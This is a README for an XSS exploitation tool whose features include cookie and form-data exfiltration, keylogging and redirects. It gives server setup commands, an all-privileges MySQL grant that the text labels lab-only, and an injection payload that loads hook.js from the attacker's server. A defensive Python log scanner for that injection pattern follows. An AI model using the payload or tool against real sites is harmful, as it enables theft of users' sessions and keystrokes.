XSS Exploitation Tool is a penetration testing tool that focuses on the exploitation of Cross-Site Scripting vulnerabilities.
This tool is for educational purposes only; do not use it against real environments.
Cross-site scripting (XSS) is a common web vulnerability that allows an attacker to inject malicious code into a website, which then executes in the browser of any user who visits the site. This type of attack can result in sensitive information being stolen or altered, as well as unauthorized actions being taken on behalf of the user. XSS attacks are typically carried out by exploiting vulnerabilities in web applications that allow input from users to be interpreted as code.
There are several types of XSS exploits, including reflected and stored XSS. Reflected XSS occurs when an attacker sends a specially crafted link to a victim, which then triggers the execution of malicious code in the victim’s browser. Stored XSS, on the other hand, involves injecting malicious code directly into a website’s database so that it is executed every time someone accesses that page.
Features
- Technical Data about victim browser
- Geolocation of the victim
- Snapshot of the hooked/visited page
- Source code of the hooked/visited page
- Exfiltrate input field data
- Exfiltrate cookies
- Keylogging
- Display alert box
- Redirect user
Installation of XSS Exploitation Tool
Tested on Debian 11
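You may need Apache, a MySQL database and PHP with the following modules. On Debian 11 the default Apache page is /var/www/html/index.html, so that is the file to remove:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/html/index.html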
Install Git and pull the XSS-Exploitation-Tool source code:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
Install Composer, then install the application dependencies:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:www-data /var/www/
Initialize the database of XSS Tool
$ sudo mysql
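Create a new user with specific rights. Note that this grant gives the xet account all privileges on every database, with a password equal to the user name, so it is only suitable for an isolated lab host: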
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
Creating the database (will result in an empty page):
Visit the page http://server-ip/reset_database.php
Adapt the JavaScript hook file for XSS Exploitation Tool
The file hook.js is the hook script. You need to replace the IP address in the first line with the IP address of the XSS Tool server:
var address = "your server ip";
How it works
First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the JavaScript hook file (see exploit.html in the root directory):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
Then, when victims visit the hooked page, the XSS Tool server should list the hooked browsers.
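From the defender's side, the injection shown above leaves a recognisable trace in the web server's access log: a query parameter whose decoded value contains a script tag with a src attribute. The following is an added example, not part of the tool or its documentation, that scans access-log lines for that pattern; the host name shop.example, the sample log lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

SITE_HOST = "shop.example"  # assumption: host name of the site being monitored

# Constructed Apache "combined" log lines (sample data, not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:22 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:02:41 +0000] "GET /page.php?vulnerable_param=%3Cscript%20src%3D%22http%3A%2F%2F198.51.100.23%2Fhook.js%22%2F%3E HTTP/1.1" 200 811 "-" "Mozilla/5.0"
203.0.113.4 - - [12/Mar/2024:10:04:10 +0000] "GET /docs.php?q=%3Cscript%20src%3D%22%2Fstatic%2Fapp.js%22%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A script tag carrying a src attribute, quoted or unquoted.
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def normalise(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are inspected in clear."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def script_src_in(value):
    """Return the src URL of a script tag found in a parameter value, else None."""
    match = SCRIPT_SRC_RE.search(normalise(value))
    return match.group(1) if match else None

def scan(log_text, site_host=SITE_HOST):
    """Return one finding per query parameter that carries a <script src=...> tag."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            src = script_src_in(value)
            if src is not None:
                host = urlsplit(src).hostname  # None for a relative (same-site) path
                findings.append({"client": client, "param": name, "src": src,
                                 "external": host is not None and host != site_host})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "external" set to True means the reflected tag would load script from another host, which is the hook pattern; a finding with it set to False still indicates that markup in a parameter reached the server and that the page's output encoding should be checked.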